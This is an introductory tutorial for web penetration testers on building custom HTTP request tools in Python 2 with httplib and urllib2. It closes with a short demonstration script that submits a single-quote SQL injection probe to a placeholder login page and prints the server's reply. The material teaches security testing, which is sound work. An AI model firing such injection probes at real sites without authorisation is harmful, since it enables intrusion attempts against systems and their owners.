Python for Web application security professionals
Introduction:
Python is an open source, interactive, object oriented programming language. It's very easy to learn and an extremely powerful high level language. It runs on Windows, Linux, UNIX, Mac OSX and is free to use (even for commercial purpose) since it's based on the open source license. It can be used to write custom tools and scripts for special purpose when performing security assessment of an application.
Why program when scanners are available?
Agreed – there are commercial vulnerability scanners available in the market which can be used for vulnerability discovery, however such vulnerability scanners have their own limitations and even the most advanced scanners sometimes are not able to provide full coverage. This makes the job of a penetration tester a little more difficult, since a lot of things are missed out – especially if the product is complex. This is where custom scripts/tools come into the picture. They help in filling the gaps created by the scanner since they're customized to the target application rather than being general purpose.
Scanners tend to perform poorly when the target application is very complex thus leaving out many pages of the applications uncovered, and hence the false negatives – which create a far more challenging situation for the security team, and the management which completely relies on scanners for automating the vulnerability assessment, when compared to false positives – which are incorrectly reported issues. False positives are easy as the security analyst can easily eliminate them. However, false negatives are difficult since these are the issues which go unreported.
It should be noted here that custom tools written for specialized purpose using languages like python should not be a replacement for vulnerability scanners, and ideally should be used in addition to these scanners to get the best throughput.
Objective:
The aim of this article is to introduce web application penetration testers with python and explain how python can be used for making customized HTTP requests – which in turn can be further expanded for development of custom scripts/tools that can be developed for special conditions where scanners fail. Readers will be introduced on libraries that can help a penetration tester in making custom HTTP requests using python.
Intended Audience:
Anyone interested in learning the basics for developing custom tools or scripts will find this article interesting, although the article has been written keeping in mind web application penetration testers as the primary audience.
Out of Scope:
This article will focus only on some of the aspects that can be relevant for security assessment of web based applications. Python can also be used for developing tools that aid in malware analysis, network security assessments, forensics etc. However, such areas are out of scope for this article. This article instead will focus on modules that can be used for making custom HTTP requests using python. Last but not the least; this is not a Python language tutorial. If you are interested in learning the basics of Python language itself, there are many out there.
It's strongly recommended the readers new to Python take up a crash course on Python before jumping directly into this article.
Setting up the Environment
This article will not get into the details of setting up the environment – which is straight forward. Installers are available for Python and can be downloaded from – http://www.python.org/getit/
If you are a Linux or Macintosh user, chances are high that you don't have to install python, since it comes pre-installed for Macintosh by Apple and by concerned vendor for most Linux distro. To check if Python is installed on your system, launch the command prompt and type "python", if python is pre-installed, we should be able to see the interpreter getting launched as shown in the following screen shot:
[caption id="" align="alignnone" width="617"] Click to Enlarge[/caption]
Although the example here is for OSX, it should not be much different for a Linux installation either.
Windows users can download the installer from above mentioned URL and install Python. To further make the use of python easier, Windows users can add python to the system path by editing the environment variable. Once done, users can just fire up python from the command prompt – irrespective of the current working directory and still be able to invoke python interpreter.
Python Modules for crafting HTTP Requests
Python has multiple modules that can be used for generating custom HTTP Requests. We'll cover 2 such modules that can be used for developing customized scripts, and can fire up our payloads along with performing the same actions that a penetration tester performs manually – the only difference being, this is done by a script instead of a manual attempt. The modules that we will cover are:
httplib
This module has been renamed to httplib.client in python 3, however since in this article I am using version 2.7.*, I am going to stick with httplib as far as this article is concerned. Normally this module is not directly used but instead urllib module uses it internally to make HTTP Requests. However, interested users can always use it directly.
In order for us to send custom requests, we need to follow the following steps:
-
Import the library
Before using a library, we need to import it. Since in this case, we are going to use httplib library to send HTTP Requests and receive the responses back, we need to import it.
-
Create a Connection
Once imported, we can start using it straight away. In this step, we need to create a connection object first. This can be achieved using HTTPConnection() method
-
Send HTTP Request
So far no HTTP Request is sent on the wire. In order to do so, use request() method. This is when the HTTP packet that we have created in previous steps is sent out over the network to the target web server using the method passed on as an argument (in our case GET, as shown in following figure).
-
Get HTTP Response
Now that we have sent a request, we can use getresponse() object to get server's response. This method will return HTTP Response object back, which when read will send output generated by the server.
The following Screenshot lists these four steps executed from an interpreter:
[caption id="" align="alignnone" width="620"] Click to Enlarge[/caption]
In our case, invoking a HTTP request is resulting into a 302 redirect. It should be noted here that we can't read "res" variable as it is, since it will only point us to the HTTP Response object. The read() method provides a raw string which is returned by the target web server as shown in above figure.
urllib2
"urllib2" is a little different from "httplib" library when it comes to creating and sending out HTTP Requests. "urllib2". We don't have to open up a connection and instead after importing, we can directly make a request –as shown in following figure:
This is much simpler when compared to httplib. It is suggested that users make use of urllib2 as it's recommended even by the python community.
It's recommended that readers go through the python documentation to understand what all functions are supported by urllib2 module to explore full potential of this library and utilize it when creating your own tools or scripts.
In the following section, we'll see a sample SQL Injection tool that I've created only for demonstration purpose. It hits the login page of the website and injects single payload.
Sample SQL Injection Script:
The following is a simple script:
[sql]
import urllib
import urllib2
location = "http://test_target.site/login.aspx"
values = {"username":"'","password":"password","btnSubmit":"Login"}
data = urllib.urlencode(values)
req = urllib2.Request(location,data)
response = urllib2.urlopen(req)
page_data = response.read()
print page_data
First we are importing urllib and urllib2 libraries. We are then associating the target URL to variable "location" and assigned post data to variable "values". Once these steps are completed, we are encoding the URL data and then submitting the request to the server and reading the response received.
The above script is just to show how easily one can create custom tools. The above script is far from perfect and will need much modification before using in practice. It only fires one request, while in real life our tool should fire multiple requests by iterating over a list of payloads. It's left as an exercise to readers to go through libraries and the functions it supports to understand how they can create their own tools. A real life tool will also have to take care of session management and hence needs to also deal with cookies and other HTTP headers like referrers, Content Type etc. We'll also need to iterate over the a list of URL's repeatedly until all our payloads are fired one by one for each and every parameter in order to ensure coverage.
Conclusion:
Python is an easy to learn language which can be helpful to penetration testers to create their custom tools which they can use to achieve coverage. Thus plugging in holes which are at times created by vulnerability scanners because they are unable to hit certain pages due to one or the other reason. Users can create reusable code by using python's object orientation which can help them create classes that can be inherited and extended. Python can not only be used for quick and dirty scripting to achieve small automation tasks but also be used to create enterprise class vulnerability scanning routines.
Would you like to test your skills further with a CTF challenge? Check this out:
References:
Become a certified reverse engineer!